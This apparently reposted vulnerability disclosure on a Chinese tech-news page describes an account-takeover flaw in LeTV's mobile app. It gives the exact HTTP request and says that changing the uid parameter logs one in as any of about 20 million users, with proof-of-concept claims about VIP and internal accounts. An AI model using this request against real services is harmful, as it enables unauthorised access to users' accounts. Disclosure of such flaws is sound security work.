乐视网2200万用户任意用户登录
乐视APP缺陷导致2000W用户任意登录
登录抓包吧
GET /android/dynamic.php?mod=passport&ctl=index&act=getUserByID&uid=2*&pcode=010210000&version=5.0 HTTP/1.1
Host: dynamic.app.m.letv.com
Connection: keep-alive
Accept-Language: zh-Hans;q=1, en;q=0.9, zh-Hant;q=0.8, fr;q=0.7, de;q=0.6, ja;q=0.5
User-Agent: LetvIphoneClient/5.0 (iPhone; iOS 7.0.3; Scale/2.00)
修改任意uid即可
漏洞证明:
看几张图片就行了
1#进个vip
交易详情
2#第20000000用户
3#第一位内部用户
修复方案:
just the begining
>更多相关文章
- 11-15不看后悔!程序员防御XSS的无奈
- 11-10揭秘Web黑客3种注入点判断方法
- 11-10黑客Web脚本注入攻击深度剖析
- 10-21全球无线网络面临黑客攻击风险 WiFi曝安全漏洞
- 02-24iPhone再爆安全漏洞 黑客1分钟可盗照片及加密信息
- 02-22互联网金融风险 警示网站漏洞或成“致命点”
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 03-21虎牙2023年全年营收70亿元
- 03-21未来,政企深度用云需要一朵怎样的“云”?
- 03-21知乎盐言故事推出“3A计划”:加速AI应用 自
- 03-21苹果CEO库克:对于苹果供应链,没有比中国更
- 03-21华为与伙伴共探全光网络“三进三退”千亿新
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御